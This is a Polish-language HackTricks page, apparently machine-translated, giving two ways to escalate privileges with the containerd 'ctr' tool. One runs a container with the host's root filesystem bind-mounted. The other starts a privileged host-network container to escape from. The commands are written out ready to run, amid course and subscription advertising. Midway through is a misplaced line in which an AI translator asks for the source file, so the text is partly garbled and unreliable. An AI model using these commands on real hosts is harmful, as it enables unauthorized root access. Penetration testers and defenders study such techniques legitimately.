Containerd (ctr) Privilege Escalation
Tip
Ucz się i ćwicz Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.
Podstawowe informacje
Przejdź do poniższego linku, aby dowiedzieć się gdzie containerd i ctr mieszczą się w stosie kontenerów:
PE 1
Jeśli na hoście znajduje się polecenie ctr:
which ctr
/usr/bin/ctr
Potrzebuję zawartości pliku, aby wypisać obrazy. Wklej proszę zawartość src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md lub podaj dostęp do pliku. Po otrzymaniu pliku wypiszę wszystkie obrazy i przetłumaczę tekst zgodnie z wytycznymi.
ctr image list
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
A następnie uruchom jeden z tych obrazów, montując w nim katalog root hosta:
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
PE 2
Uruchom privileged container i wydostań się z niego.
Możesz uruchomić privileged container jako:
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
Następnie możesz użyć niektórych technik wymienionych na poniższej stronie, aby escape from it abusing privileged capabilities:
Tip
Ucz się i ćwicz Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.


